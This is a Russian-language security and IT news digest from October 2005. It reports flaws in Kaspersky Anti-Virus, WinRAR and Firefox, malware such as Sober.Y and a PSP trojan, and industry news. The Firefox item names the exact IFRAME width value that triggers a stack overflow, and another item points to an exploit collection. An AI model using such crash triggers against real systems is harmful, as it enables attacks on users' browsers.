iDEFENSE сообщает о наличии уязвимости в антивирусе KAV (Kaspersky Anti-Virus), которая связана с некорректной проверкой граничных условий при обработке CHM-файлов (файлы справочных руководств Windows). При обработке специальным образом созданного CHM-файла может возникнуть переполнение буфера в куче (heap-based buffer overflow), что, в свою очередь, может привести на Windows-платформах к невозможности антивирусной проверки других файлов (DoS антивируса). Уязвимости подвержены Kaspersky Personal 5.0.227 и Kaspersky Anti-Virus On-Demand Scanner for Linux 5.0.5. Кроме того, также сообщается о наличии подобной уязвимости в F-Secure Anti-Virus for Linux, что, в общем-то закономерно, потому что он основан на антивирусном движке KAV. К чести разработчиков нужно признать, что сигнатуры возможных атак были включены "ЛК" в июле 2005 г.
Описание

11/10/2005 11:50 Уязвимости в WinRAR
Tan Chew Keong из Secunia Research сообщает о наличии уязвимостей в популярном Windows-архиваторе WinRAR. Первая уязвимость типа форматной строки обнаружена при выводе сообщения об ошибочном имени файла, закодированного UUE/XXE, что может быть использовано злоумышленником для выполнения произвольного кода в системе при обработке специальным образом сформированного файла. Вторая уязвимость присутствует в механизме проверки граничных условий библиотеки UNACEV2.DLL и может быть использована атакующим путём формирования очень длинного имени файла, который, будучи обработан архиватором, может вызвать переполнение буфера в стеке. Как сообщается, RARLAB выпущена обновлённая версия архиватора 3.51, в которой устранены эти уязвимости.
Описание

11/10/2005 11:28 RedHat CEO o консолидации дистрибутивов Linux
Исполнительный директор RedHat отверг идею о том, что уменьшение количества дистрибутивов Linux улучшит состояние индустрии, а приобретение компанией Novell немецкого производителя Suse назвал театром. Сейчас существует более трёхсот дистрибутивов Linux, но Matthew Szulik поддерживает это разнообразие и специализацию, говоря о том, что это лучше, чем ситуация когда потребителям будет прделожено всего несколько альтернатив. Также он добавил, что RedHat не собирается приобретать никакие другие компании, производящие дистрибутивы Linux: "В мире Linux, как ни в каком другом важна идея естественного отбора".
Подробности

11/10/2005 10:56 Музыканты учат поклонников, как "сломать" CD с защитой от копирования
В то время как крупнейшие звукозаписывающие лейблы выпускают все больше и больше дисков, оборудованных технологией защиты от копирования, дело приняло неожиданный оборот. Своих поклонников - владельцев iPod'ов решили поддержать музыканты, чьи пластинки выходят на защищенных дисках. Теперь на своих сайтах известные музыканты, например, Foo Fighters, инструктируют фанатов в обходе защиты. Одно из предлагаемых решений - перелить диск в файл Windows медиа, потом скопировать треки на болванку (без защиты), а затем перекачать на iPod. Гитарист одной из команд пошел еще дальше - на сайте хостинга, принадлежащего Sony Music, он запостил ссылку на программу CDEX, которая блокирует технологию защиты. Правда, в скором времени ссылка была удалена. "Мы пришли в ужас, узнав, что то, над чем мы трудились в течение двух лет, омрачается неразберихой с новыми технологиями", - говорит музыкант. Сейчас диски, защищенные от копирования, совместимы только с устройствами, поддерживающими технологию Windows Media. Система DRM определяет используемые для копирования форматы, куда mp3 не входит, и лимитирует количество копий. Компания Apple - ведущий игрок на цифровом музыкальном рынке - отказался от предложения звукозаписывающих лейблов лицензировать свой FairPlay DRM для использования с защищенными CD. Между тем, жалоб от поклонников, у которых есть плеер iPod, поступает все больше. Письма от разгневанных поклонников, которые и не подозревали, что покупают "ограниченный" диск, приходят на сайты музыкантов и в онлайновые магазины. Представители Sony BMG утверждают, что не пытаются запретить копировать музыку на iPod, а всех недовольных отправляют на сайт, где подробно разъясняется, как работать с новой технологией.
"Компьюлента"

11/10/2005 10:36 "СофтИнформ" выпустила Spam Blocker 2.3
Компания «СофтИнформ» выпустила очередную версию программы фильтрации спама Spam Blocker. Новая версия удаленного блокировщика Spam Blocker 2.3 позволяет защитить компьютер пользователя (а в частности, почтовый ящик) от потоков «спама» за счет того, что анализ корреспонденции проводится без скачивания писем с почтового сервера. Программа проверяет почту и получает заголовки писем, находящихся в почтовом ящике пользователя (адреса электронной почты, имена адресатов, темы письма и так далее). В Spam Blocker 2.3 введена поддержка импорта информации из аккаунтов основных почтовых клиентов, что позволяет сэкономить время при подключении новых почтовых ящиков к блокировщику. Добавлено информационное окно, при помощи которого просмотр полной информации корреспонденции потребует лишь одного клика. Теперь Spam Blocker 2.3 сохраняет заданную пользователем ширину информационных колонок, что делает процесс работы с программой более простым и удобным. В Spam Blocker 2.3 улучшен процесс самообучаемости. Добавлен новый фильтр, который позволяет улучшить качество поиска по сообщениям. Также в блокировщике реализована поддержка Unicode. В новой версии доработан и улучшен процесс сортировки почтовых сообщений и решена проблема, возникавшая при автозапуске программы. Версия для Windows-систем стоит 600 рублей. Как и положено, в мире открытых систем существует альтернатива в виде бесплатного Spamassassin. Кроме того, для клиентских машин фильтрацию спама можно осуществлять в виде бесплатных программ, например, SpamPal.
Подробности

11/10/2005 10:13 Intel возглавит наступление на фронте 400-Мбит/с беспроводной сети
Несколько производителей аппаратуры Wi-Fi решили ускорить стандартизацию технологии MIMO, поддерживающей скорость передачи данных свыше 400 Мбит/с. Как стало известно из информированных источников, ведущие производители микросхем Wi-Fi планируют анонсировать новый отраслевой форум, который поможет ускорить создание стандарта более быстродействующих беспроводных сетей. Intel, Broadcom, Marvel и Atheros, в обход процесса IEEE, работают над проектом нового стандарта 802.11n, который они планируют передать на рассмотрение рабочей группы IEEE. Цель создания форума — ускорение процесса IEEE, которому мешала политическая борьба между двумя разными группами. Вероятно, что новый форум еще больше усилит этот раскол в технологическом сообществе. Новый стандарт будет, скорее всего, основан на технологии, называемой multiple-input/multiple-output (MIMO), которая позволяет передавать два и более разных сигналов одновременно по одному и тому же радиоканалу 802.11, не вызывая помех, и таким образом повысить пропускную способность беспроводных ЛС до более чем 300 Мбит/с. Стандарты 802.11a и 11g, используемые сегодня, обеспечивают пропускную способность от 20 до 24 Мбит/с. В последние месяцы проект по стандартизации этой технологии разделился на два непримиримых лагеря. С одной стороны действует группа, называющая себя Task Group 'n' synchronisation, или TGn Sync. Ее поддерживают Intel, Atheros, Nortel, Samsung, Sony, Qualcomm, Philips и Panasonic. Этой группе противостоит союз World-Wide Spectrum Efficiency, или WWiSE. Его возглавляет компания Airgo Networks, которая в настоящее время является единственным производителем микросхем с использованием технологии MIMO. Ее поддерживают Broadcom, Motorola, Nokia, France Telecom, Texas Instruments и NTT.
Подробности

11/10/2005 09:42 Microsoft подала иск против рижских домашних пиратов
Корпорация Microsoft намеревается взыскать с пойманных в столице Латвии Риге компьютерных пиратов 3 миллиона латов (около 5 миллионов долларов США) в качестве компенсации материального ущерба, сообщает латвийское новостное агентство ЛЕТА со ссылкой на представителя Microsoft Яниса Борданса. Компания подала гражданский иск по уголовному делу, по которому в незаконном размножении программ "Microsoft" и их распространении в промышленных масштабах обвиняются двое мужчин. Латвийская экономическая полиция совместно с международной организацией по защите авторских прав производителей ПО Business Software Alliance (BSA) задержала их в начале года. В квартире на улице Ницгалес в Риге они организовали промышленное производство контрафактных дисков с копиями ОС Windows 98 SE и Windows 2000. Отмечается, что "качество поддельной продукции, по оценке экспертов, было высоким, что позволяло пиратам реализовать ее как оригинальные продукты Microsoft по цене лишь ненамного ниже легальных программ". Готовая пиратская продукция распространялась не только в Латвии, но и за рубежом через интернет-магазин eBay.de.
Источник

10/10/2005 14:29 Система разграничения доступа к информации "Криптон-Щит"
Компания "Анкад" выпустила систему разграничения доступа СРД "Криптон-Щит", предназначенную для обеспечения защиты информации от несанкционированного доступа в автоматизированных информационных системах на базе автономных средств вычислительной техники. Среди ее возможностей - идентификация и аутентификация пользователей, контроль и разграничение доступа к ресурсам компьютера, к процедурам (программам), периферийным USB-устройствам и процессам печати, а также аудит событий в системе защиты информации. Предусмотрена интеграция данной системы с аппаратными средствами защиты "Анкад" - шифратором жесткого диска "Криптон-IDE", USB-шифратором "Криптон-USB", абонентскими шифраторами и др. Система "Криптон-Щит" прошла сертификационные испытания в испытательной лаборатории ФСТЭК и соответствует всем требованиям.
Источник

10/10/2005 12:42 В Нидерландах арестованы трое взломщиков компьютерных сетей
В Нидерландах арестованы трое молодых людей, профессионально занимающихся взломом компьютеров и компьютерных сетей. Ожидается, что эа этим последуют новые аресты. Органы юстиции полагают, что хакеры вторглись по меньшей мере в 100 тыс. персональных компьютеров в Нидерландах и других странах мира. При помощи взломанных компьютеров они создали самую большую из до сих пор известных так называемых "зомбированных сетей", которая использовалась для заражения компьютеров вирусами, нелегального внедрения в них рекламы, установки программ, применяемых в шпионских целях, кражи банковских данных. Преступники совершали атаки на компьютеры, в частности, с помощью вируса "Троянский конь" (прим. ньюсмейкера: Браво, журналисты YTRO.RU!) , который позволяет контролировать чужие компьютерные системы. Вышеупомянутые хакеры, в частности, шантажировали одну фирму в США, угрожая ей выведением из строя ее компьютерной сети. Кроме того, они грабили счета системы Paypal, которая используется для оплаты на аукционном сайте eBay.
YTRO.ru

10/10/2005 12:20 Патч для управления IPFW2 непривилегированным пользователем
Патч добавляет возможность управлять файрволом во FreeBSD через псевдо-устройство /dev/ipfwctl, cообщает opennet.ru. Права доступа к этому пвсевдо-устройству определяют разрешённые действия над файрволом. Для изменения состояния файрвола необходимы права для записи, для просмотра состояния - права для чтения.
Описание

10/10/2005 11:56 Названия вирусов будут стандартизированы
Американская организация US-CERT, занимающаяся проблемами в области компьютерной безопасности, предложила использовать стандартные названия для интернет-червей и других вредоносных программ, сообщает сайт vnunet.com. Члены US-CERT назвали свою программу «Общая классификация вредоносных программ» (CME). Цель программы — не вводить пользователей в заблуждение, используя разные названия для одних и тех же вирусов. Например, червь W32.Zotob.E по классификации Symantec в классификации McAfee называется W32/IRCbot.worm!MS05-039, а Trend Micro называет эту программу WORM_RBOT.CBQ. Сейчас многие вирусы получают свои названия на основании описания или информации, включенной в код программы их создателями. В новой системе вирусы будут использовать номера CME. Первый вирус получит название CME-1. Подобная система классификации уже существует для описания уязвимостей в программном обеспечении. Общий идентификатор уязвимостей включает себя порядковый номер и год, в котором уязвимость была выявлена. В идентификатор вирусов не включат дату, потому что пользователи часто неправильно воспринимают эту информацию. Они считают, что уязвимость с ранней датой менее опасна, чем уязвимость, выявленная позже. Инициаторы предложения о CME допускают использование и старых вирусных имен, но надеются, что их система улучшит обмен информацией между антивирусными разработчиками и антивирусным сообществом в целом. Проект уже поддержали Computer Associates, McAfee, Microsoft, Symantec и F-Secure.
Подробности

10/10/2005 11:32 У Skype появился конкурент в России
У популярного сервиса Skype появился российский конкурент: Россвязьнадзор выдал провайдеру "РТКомм.РУ" лицензию, позволяющую связывать абонентов, пользующихся IP-телефонами или компьютерами на территории всей России. Но в Россвязьнадзоре подчеркивают, что у провайдера не будет выхода в телефонную сеть общего пользования. Пользователями новой услуги "РТКомм.РУ" станут крупные корпоративные заказчики и небольшие операторы, пишет газета "Ведомости". Провайдер сможет напрямую связывать офисы, расположенные в разных городах, что обойдется клиенту значительно дешевле, чем пользование обычной телефонией. Операторы IP-телефонии считают, что идея представляет интерес, даже если у IP-абонентов не будет выхода на обычную телефонную сеть. По словам директора по маркетингу компании "Корпорация ОСС" Дмитрия Красильникова, IP-операторы могут сформировать абонентскую базу с собственной нумерацией, причем номером может выступать электронный адрес или специальный ник, как в интернет-пейджере IСQ. Однако позволить себе такое общение смогут лишь люди, имеющие качественный доступ в интернет, а таких в России не более 1 миллиона человек, причем треть из них москвичи.
Источник

10/10/2005 10:34 Уязвимость в Firefox
Tom Ferris сообщает о наличии уязвимости во всё больше набирающем в последнее время браузере Firefox. Как сообщает автор, уязвимость связана с некооректной обработкой параметра ширины тэга IFRAME. Если задать его величину (IFRAME WIDTH) равной 33333333, произойдёт переполнение буфера в стеке, что может позволить выполнить произвольный код в системе. Уязвимость проверена в версии 1.0.7 для ОС Linux. Mozilla в настоящий момент работает над патчем.
Описание

10/10/2005 10:08 Китай приказал сотовым операторам за месяц избавиться от SMS-спама
Власти Китая приказали сотовым операторам страны избавиться от SMS-спама, получающего все большее распространение в китайских сетях в последнее время. Как сообщается на сайте агентства "Синьхуа", распоряжение правящей партии было издано в рамках борьбы с "нездоровыми" явлениями, возникающими по мере информатизации китайского общества. Министерство информационной индустрии опубликовало заявление, в котором возмутилось количеством "грязи", скрытой в телекоммуникационных сетях и охарактеризовало ситуацию как серьезную. В нарушение регулирующих норм по сетям общего пользования распространяется реклама порноресурсов, игорных ресурсов и эзотерических услуг, которые в стране запрещены, так как "засоряют общество и распространяют очень дурное влияние". В течение октября операторы мобильной связи будут проверяться на предмет выполнения ими нового требования министерства. Те, кто не сможет справиться с SMS-спамом, будут наказываться.
Lenta.Ru

9/10/2005 12:34 Эксплоиты уязвимостей в ОС Windows
Довольно любопытный проект по соответствию эксплоита на каждый Microsoft патч был обнаружен в Интернет. Проект называется ElseNot Project. Как написано на самом сайте, проект основан и поддерживается группой добровольцев. На настоящий момент на сайте собрано 115 эксплоитов для 449 бюллетней (самый старый датирован 1 июня 1998 года).
Сайт проекта

9/10/2005 11:12 В Сети появляется все больше гибридов
Что получится, если ежа скрестить с удавом? Два метра колючей проволоки. По такому же принципу действуют современные разработчики, совмещая веб-сервисы, у которых открыты API. В современных условиях многие крупные сайты стремятся привлечь на свою сторону сообщество разработчиков. Для этого они открывают доступ к своим программным интерфейсам, чтобы разработчики могли создавать собственные приложения на оригинальном «движке». Сейчас кто угодно может получить доступ к API таких популярных сервисов, как Google, eBay, Amazon, Yahoo, Flickr, PayPal, Skype и многих других. Всего известно около сотни сервисов с открытым API: поисковые сервисы, интернет-магазины, ньюс-аггрегаторы, блоггерские платформы, контент-архивы, фотослужбы, медицинские базы данных, платежные системы и т.д. Неудивительно, что очень многие разработчики с удовольствием пользуются этой возможностью и создают свои собственные уникальные сайты на чужом движке. Так, на движке Google Maps функционируют десятки разнообразных сайтов. Например, карта проживания американских знаменитостей, карта дешевых заправок, криминогенная карта Чикаго, сервис знакомств, карта географической привязки статей из энциклопедии Placeopedia и многие другие. В Сети существуют настоящие гибриды, которые представляют собой помесь из нескольких сайтов. Например, существует помесь Amazon + Flickr, Amazon + Google, BBC + Google Maps. Разумеется, это далеко не полный список.
Более подробно

9/10/2005 10:20 В помощь процессору
Как сообщают в компании Level 5 Networks, выпущенный ею сетевой адаптер EtherFabric при использовании в сервере позволяет высвободить значительное количество ресурсов центрального микропроцессора, уходящих на обработку сетевых протоколов. Адаптер снабжен двумя портами Gigabit Ethernet (в дальнейшем планируется выпуск модели, поддерживающей 10 Gigabit Ethernet). Свой продукт в Level 5 предлагают применять в системах высокопроизводительных вычислений, а также в крупных серверах баз данных и системах, на которых исполняется по нескольку виртуальных машин. По словам представителей компании, производительность чисто вычислительных приложений устройство способно повысить вчетверо. Нагрузку на процессор адаптер уменьшает, самостоятельно выполняя за него обработку сетевых протоколов. Кроме того, благодаря использованию механизма прямого доступа к памяти при обращении приложений к сетевым функциям, от лишних операций ввода/вывода освобождается системная шина. Стоимость адаптера - 500 долл.
"Открытые системы"

9/10/2005 10:04 Oracle заявляет о приобретении Innobase
Компания Oracle планирует усилить поддержку программных продуктов с открытым исходным кодом, в связи с чем объявила о покупке компании Innobase. Innobase - разработчик технологии InnoDB, которая входит в состав MySQL.
Подробности

9/10/2005 09:42 Эндрю Мортон: Разработка Linux-ядра замедляется
Близкий соратник отца ОС Linux Линуса Торвальдса (Linus Torvalds) Эндрю Мортон (Andrew Morton) сообщил о том, что разработка нового ядра открытой операционной системы значительно замедлилась, а для грядущей версии предусмотрено меньшее количество исправлений и нововведений. Тем не менее, ядро будет выпущено к концу текущего года, а реализация нескольких новых функций будет выполнена позже. «С версией ядра 2.6.15 пока ничего интересного не происходит: примерная дата его выпуска будет названа в мае будущего года. У нас уже готова сборка 2.6.14 RC2 и всего около 100 обновлений для 2.6.15», — сказал Мортон. Кроме того, он добавил, что основной проблемой, из-за которой разработка замедляется, является немалое количество багов — их искоренение требует много времени.
Источник

8/10/2005 13:09 Пентагон потратит $7,5 млрд на создание "военного Интернета"
По прогнозу компании Forecast International, Минобороны США за десятилетие потратит $7,5 млрд на программу по созданию "военного Интернета". Эта система связи носит название GIG (аббревиатура фразы Global Information Grid - Глобальная Информационная Сеть). Она призвана связать воедино ныне разобщенные системы разведки, коммуникации, управления огнем и т.д. Пентагон считает GIG базисом для создания вооруженных сил будущего. GIG должен быть способен передавать огромные массивы информации и обеспечивать взаимодействие всех составляющих вооруженных сил: от главнокомандующего до отдельного солдата. Главная проблема "военного Интернета" - обеспечение его безопасности. GIG требуется защитить от компьютерных вирусов, хакеров, а также атак с использованием традиционного и энергетического оружия. Как известно, и "настоящий" Интернет был создан по заказу Пентагона - изначально он должен был стать системой связи между командными пунктами в случае ядерной войны.
Источник

8/10/2005 12:38 Сотовым сетям грозят SMS-атаки
Хакеры могут парализовать работу сотовых телефонных сетей посредством рассылки SMS-спама. К такому выводу пришел профессор университета штата Пенсильвания Патрик Макдэниел (Patrick D. McDaniel), сообщает газета New York Times. Подобная атака возможна в силу специфики работы SMS-сервиса в мобильных сетях. Эта специфика позволяет одновременно с перегрузкой текстовых каналов сети вывести из работоспособного состояния и голосовые каналы. С учетом того, что SMS могут отправляться через интернет, сотовые сети оказываются открыты для DoS-атак, которые в онлайне случаются регулярно. В ходе DoS-атаки сеть компьютеров направляет к атакуемому серверу огромное количество запросов, с которым он не справляется и оказывается недоступным. Отправляя 165 SMS в секунду, можно оставить без сотовой связи «весь Манхэттен», полагает Макдэниел. Сотовые операторы признают возможность подобных атак, но при этом заявляют, что имеют в своем распоряжении эффективные меры противодействия. «Если вы не готовы, это может случиться. Если же готовы и имеете средства для распознавания и противостояния, это не стоит большого внимания», — заявил один из SMS-операторов. Другие специалисты полагают, что системы защиты сотовых сетей сталкиваются с теми же проблемами, что и системы защиты от DoS-атак. «В интернет-мире нет тенденции к созданию очень элегантных решений. Я уверен, что и в сотовых сетях будет происходить то же самое», — комментирует ситуацию инженер компании Cigital Гари Макгроу (Gary McGraw). Макдэниел полагает, что SMS-атаке могут подвергнуться все крупнейшие сотовые операторы. При этом хакерам понадобится всего один компьютер с модемом.
Источник

8/10/2005 11:57 Выход Mandriva Linux 2006
Совместными усилиями объединенной команды Mandriva, Conectiva и Lycoris выпущен десктоп ориентированный Linux дистрибутив Mandriva 2006, сообщает opennet.ru. В новой версии улучшена система установки, уменьшено время загрузки, добавлены: новый пакетный менеджер Smart, программа обновлений DeltaRPM, система для автоматической установки. В комплект включены KDE 3.4, GNOME 2.10, ядро 2.6.12, gcc 4.0, X.org 6.9, glibc 2.3.5, OpenOffice.org 1.1.5. Кроме того можно найти такие закрытые продукты как Opera, Skype, AdobeReader 7, RealPlayer 10, Flash Player 7.
Подробности

8/10/2005 11:35 Microsoft выпустит в октябре девять заплаток
В рамках октябрьского ежемесячного выпуска обновлений для своих программ компания Microsoft представит девять заплаток для дыр разной степени опасности, а также очередную версию утилиты для поиска наиболее распространенных вирусов - Microsoft Malicious Software Removal Tool. Большая часть заплаток - восемь штук - коснется Windows и Internet Explorer. В частности, издание eWeek сообщает о том, что в числе октябрьских обновлений будет свежий кумулятивный патч для браузера Internet Explorer. Некоторые из обновлений будут иметь критический статус и потребуют перезагрузки компьютера после своей установки. Единственным патчем для других продуктов Microsoft станет заплатка для серверного пакета Microsoft Exchange. Обновление для Exchange буден носить статус важного. Все заплатки будут выпущены во вторник 11 октября. Скачать их можно будет с сайта Microsoft, службы Windows Update, Microsoft Update и встроенные в Windows средства автоматического обновления.
Подробности

8/10/2005 11:02 Linspire Professional — корпоративный Linux-дистрибутив
Компания Linspire (ранее Lindows) готовит к выпуску версию своего дистрибутива Linux, предназначенную для предприятий, — Linspire Professional. Как сообщается, программный продукт будет представлять собой расширенный вариант пользовательского дистрибутива Linspire, сохранивший набор функций Click 'n' Run (CNR), которые призваны обеспечить простоту в обращении с системой. CNR упрощает, в частности, процесс поиска и загрузки требуемых приложений и обновлений, а в корпоративной редакции обеспечит простоту администрирования системы. В числе функций уровня предприятия Linspire Professional — единое хранилище документов, инструментарий управления развертыванием ПО на пользовательских системах, имеющий доступный через браузер web-интерфейс, а также система управления лицензиями на программные продукты.
Подробности

8/10/2005 10:50 Wi-Fi с дальностью действия 5 км
Компания Maspro Denkoh предлагает систему, позволяющую передавать сигнал Wi-Fi на расстояние до 5 км. Система полагается на разработанные в компании антенны с высоким коэффициентом усиления и является совместимой со стандартным оборудованием сетей IEEE802.11b/g, поддерживающим возможность использования внешних антенн. Компания предлагает антенны двух типов: одна в виде трубки длиной около полуметра, другая значительно короче, с квадратным профилем. Использование двух трубчатых антенн на каждой из конечных точек канала обеспечит возможность передачи данных по нему на расстояние около 5 км, применение одной антенны сократит дистанцию до 2 км, двух компактных антенн - до 1 км. Maspro предлагает заказчикам полноценную систему удаленного видеонаблюдения на базе своей разработки. Она состоит из комплекта камер, видеокодировщика, передающего устройства, антенн для контролируемого пункта и принимающей стороны, а также программного обеспечения, поддерживающего возможность одновременной работы с девятью удаленными камерами. Все оборудование рассчитано на возможность наружного использования.
"Открытые системы"

8/10/2005 10:28 Два британца сели в тюрьму за рассылку "червя"
Суд приговорил к тюремному заключению двух молодых жителей Великобритании за распространение компьютерного вируса в глобальном масштабе в 2003 году, сообщает телеканал Sky News. 24-летний Эндрю Харви (Andrew Harvey) получил шесть месяцев, его сообщник 22-летний Джордан Брэдли (Jordan Bradley) получил три месяца тюрьмы. Они были арестованы еще в 2003 году в ходе расследования по делу о глобальном распространении некоего вируса-"червя", название которого не приводится. Расследование вели совместно правоохранительные органы Великобритании и США. Также по этому делу тогда же в американском штате Иллинойс был арестован еще один фигурант. Арестованные британцы в ходе слушаний признали свою причастность к рассылке "червя" и сообщили, что действовали по сговору с другими "хакерами". Вместе с тем, отмечается, что распространившийся "червь" не нанес существенного ущерба. Тем не менее, суд признал его потенциальную опасность и подчеркнул то, что действия молодых людей могли стать источником более серьезной опасности.
Подробности

7/10/2005 15:37 В бюро патентов отказали Microsoft в лицензировании FAT
Бюро патентов США отказало Microsoft в двух патентах на файловую систему FAT, однако гигант программного обеспечения не намерен сдаваться. Постановление бюро появилось еще в прошлом месяце, однако только теперь было обнародовано. По одному из патентов принято «окончательное» решение в отказе, а по второму — «неокончательное». Однако в обоих случаях Microsoft имеет право отстаивать свои требования. Файловая система FAT была разработана для операционной системы Windows, однако широко используется в компьютерной сфере для хранения данных. В частности, и в свободном софте — например, FAT используется проектом Samba, позволяющим компьютерам под управлением UNIX/Linux-систем обмениваться данными с Windows-машинами, и самим ядром ОС Linux для записи и хранения файлов на разделах жесткого диска с Windows. Предполагалось, что если Microsoft получит патенты на FAT, корпорация сможет обвинить Linux в нарушении авторских прав на свою технологию и потребовать денежных отчислений, что может стать проблемой для ПО, распространяемого под Open Source-лицензией GNU GPL.
Nixp.Ru

7/10/2005 13:04 Первый троянец для PlayStation Portable
Специалисты компании Symantec нашли в чатах геймерского сообщества первую троянскую программу для игровой консоли Sony PlayStation Portable (PSP). Программа, которую представляли как средство запуска собственного кода на PSP и других консолях Sony, оказалась логической «бомбой», уничтожавшей информацию на диске игрового устройства. Опасный файл называется Exploit 2G PSP Team V1.RAR. Троянец представляет лишь ограниченную угрозу, и только для пользователей, модифицировавших свои консоли. Cпециалисты еще раз убедились в том, что для распространения вредоносного кода могут быть использованы любые платформы. Игровые консоли стали жертвой злоумышленников впервые, сообщил Reuters.
Источник

7/10/2005 12:31 Sober возвращается под видом школьного друга
Антивирусная лаборатория Panda Software зафиксировала появление новой версии червя Sober — Sober.Y, которая распространяется, используя методы социальной инженерии. Червь был перехвачен с помощью превентивной технологии Panda Software TruPreventTM. Для распространения он использует два вида писем: первое — письмо на английском языке с темой Your new password (Ваш новый пароль). Письмо замаскировано под уведомление об изменении пароля, содержащее во вложенном файле данные для ознакомления — pword_change.zip. Второе — письмо на немецком, якобы содержащее фотографии старых школьных друзей в файле KlassenFoto.zip. Оба сжатых файла содержат исполняемый файл PW_Klass.Pic.packed-bitmap.exe, который является копией самого червя. Если этот файл запущен, выводится ложное сообщение об ошибке CRC, при этом вредоносные действия продолжаются. Червь ищет электронные адреса на зараженном компьютере в файлах с определенными расширениями и, используя собственный SMTP-механизм, рассылает себя по ним. В случае, если адрес оканчивается на .de (Германия), .ch (Швейцария), .at (Австрия) или .li (Лихтенштейн), он отправляет немецкую версию письма.
Источник

7/10/2005 12:07 ИТ-катастрофы маячат впереди
Ведающие управлением рисками сотрудники многих компаний бьют тревогу по поводу финансовых потерь из-за сбоев в компьютерных системах и атак хакеров. ИТ-подразделения сами уже не в состоянии справиться с этой задачей, которая за последний год приобрела масштабный характер. Подразделение EIU (Economist Intelligent Unit) журнала «The Economist» при поддержке ACE, Cisco System, Deutsche Bank, IBM и KPMG провело исследование «Цифровые риски» (Digital Risk), в котором были опрошены 218 главных управляющих рисками, 40% из которых были из сектора финансовых услуг. Результаты исследования показали, что за последний год сбои в компьютерных системах и атаки хакеров нанесли значительный удар по финансовому балансу почти двух третей компаний. Согласно данным, 60% компаний пострадало от сбоев в системе, а треть из них понесло финансовые потери от хакерских атак. Более 55% респондентов заявили, что бороться со сбоями в компьютерных системах теперь намного труднее, так как хакеры и сетевые мошенники стали опытнее и изощреннее. Чуть менее 48% опрошенных утверждают, что проблемы ИТ безопасности могут принести серьезный ущерб их бизнесу. В большинстве организаций ответственность за ИТ риск лежит, в основном, на CIO (директор информационной службы), но подпадает также и в круг полномочий других главных менеджеров, например, CRO (управляющий рисками). Почти 50% респондентов сказали, что основной сложностью в решении рисковых задач является сверхдоверие службе ИТ в вопросах рискового контроля. Удаленная работа также стала причиной беспокойства для 57% управляющих, заявивших, что благодаря ней появилась тенденция роста электронного риска.
Источник

7/10/2005 11:24 CheckPoint приобретает компанию Sourcefire, выпускающую Snort
Компании Check Point Software Technologies Ltd и Sourcefire, Inc объявили о подписании соглашения, согласно которому Check Point покупает пакет акций Sourcefire на сумму 225 миллионов долларов. Как это скажется на дальнейшей судьбе поддерживаемой Sourcefire системой обнаружения атак Snort - сказать сложно. Может быть она просто заменит собой модуль SmartDefence, поставляемый сейчас Check Point в составе межсетевого экрана, а может быть Check Point займется разработкой сигнатур для Snort в виде платной подписки. Сам автор Snort, основатель и технический директор Sourcefire о перспективах высказывается весьма туманно.
Подробности

7/10/2005 10:39 Сканер уязвимостей Nessus закрывает свой исходный код
Исходный код одной из наиболее популярных в мире утилит безопасности - Nessus - больне не будет доступен для всех. Автор Nessus объясняет это известие тем, что лицензия Open Source вызывала конкуренцию с его компанией. Однако изменение схемы лицензирования затронет еще не выпущенный Nessus 3, а обновления к существующим ныне релизам Nessus 2.x останутся лицензированными под GNU GPL: "Nessus 3 будет бесплатным... Но не будет выпущен под GPL", сообщил автор Nessus (Renaud Deraison) в почтовой рассылке программы.
Nixp.Ru

7/10/2005 10:13 Microsoft готовит к выпуску ПО безопасности
В четверг Microsoft объявила, что до конца года она выпустит бета-версию «интегрированного решения защиты». По словам продакт-менеджера Майка Чана, бета-версия продукта Microsoft Client Protection предназначена для корпоративных настольных ПК, ноутбуков и файл-серверов и направлена «главным образом против вредоносного ПО». «Отчасти этот продукт основан на нашем потребительском ПО anti-spyware. Главное в нем то, что это единое, интегрированное решение, — сказал Чан, выступив на конференции Virus Bulletin International в Дублине. — Это единый продукт, что делает его конкурентоспособным. У Symantec, например, если вам нужна объединенная отчетность, придется покупать разные компоненты. В нашем продукте вы получаете это сразу». Кроме того, бета-версия позволит системным администраторами контролировать пользователей. «Эта функция обеспечивает наглядность и может быть интегрирована с существующей инфраструктурой предприятия», — пояснил Чан. Коммерческую версию продукта Microsoft надеется выпустить в 2007 году. «Цены еще не определены, но они будут конкурентными», — сказал Чан. Микко Хиппонен, директор по антивирусным исследованиям секьюрити-фирмы F-Secure, одобряет этот шаг Microsoft: «Мне не терпится запустить в него руки», — сказал он о новом продукте. Microsoft анонсировала Microsoft Client Protection и на мероприятии в Мюнхене, где генеральный директор Стив Баллмер с вице-президентом Майком Нэшем, ответственным за разработки в области безопасности, рассказали на пресс-конференции о секьюрити-стратегии компании и планах выпуска конкретных продуктов. Компания уже говорила о своем намерении выпустить средства защиты для предприятий, конкурирующие с продуктами Symantec, McAfee и Trend Micro.
ZDNet

7/10/2005 09:55 Конфликт американских магистральных провайдеров нарушил работу Интернета
В США некоторые клиенты крупных провайдеров Level 3 Communications и Cogent Communications со среды испытывают трудности с интернет-соединением. Сайты, расположенные на хостинговых площадках одной компании могут быть "не видны" из сети другой, и наоборот. Не доходят некоторые электронные письма. Как сообщает издание CNET News, причиной сбоев является конфликт между этими операторами. В среду они прекратили обмен трафиком друг с другом, объясняя это экономическими соображениями. В Level 3 считают, что им невыгодно поддерживать пиринговые отношения (отношения, касающиеся обмена трафиком) с Cogent и заявляют, что эта компания должна найти других партнеров, чтобы обеспечить необходимое качество соединений с другими сетями. Cogent, в свою очередь, объявила, что предлагает клиентам Level 3, которые не могут подключиться к ресурсам Cogent, год бесплатной интернет-подписки и также заявила, что не заинтересована в восстановлении соединения с Level 3. Разрозненные компьютерные сети мира соединяются друг с другом в специальных точках обмена трафиком, совокупность сетей и образует собственно Интернет. В случае нарушения по каким-либо причинам связности между отдельными сетями трафик может пойти по другим каналам, но если их емкость недостаточна или они просто отсутствуют, у клиентов тех или иных сетей могут возникнуть проблемы с интернет-связью вплоть до полного ее отсутствия.
Подробности

6/10/2005 16:57 С зарубежным коннективити опять возможны перебои
